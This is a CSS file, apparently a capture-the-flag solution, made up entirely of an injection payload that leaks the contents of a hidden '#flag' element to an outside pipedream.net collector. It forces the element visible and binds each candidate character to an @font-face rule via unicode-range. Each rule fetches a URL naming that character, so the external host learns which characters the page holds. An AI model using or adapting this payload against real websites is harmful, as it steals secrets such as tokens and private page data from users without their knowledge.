body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W36')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w36,p98w36,p106w36,p112w36,p115w36,p121w36,p122w36,p48w36,p49w36,p52w36,p53w36,p55w36,p125w36,monospace;width:36ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W36');unicode-range:U+0061}
@font-face{font-family:p98w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W36');unicode-range:U+0062}
@font-face{font-family:p106w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W36');unicode-range:U+006A}
@font-face{font-family:p112w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W36');unicode-range:U+0070}
@font-face{font-family:p115w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W36');unicode-range:U+0073}
@font-face{font-family:p121w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W36');unicode-range:U+0079}
@font-face{font-family:p122w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W36');unicode-range:U+007A}
@font-face{font-family:p48w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W36');unicode-range:U+0030}
@font-face{font-family:p49w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W36');unicode-range:U+0031}
@font-face{font-family:p52w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W36');unicode-range:U+0034}
@font-face{font-family:p53w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W36');unicode-range:U+0035}
@font-face{font-family:p55w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W36');unicode-range:U+0037}
@font-face{font-family:p125w36;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W36');unicode-range:U+007D}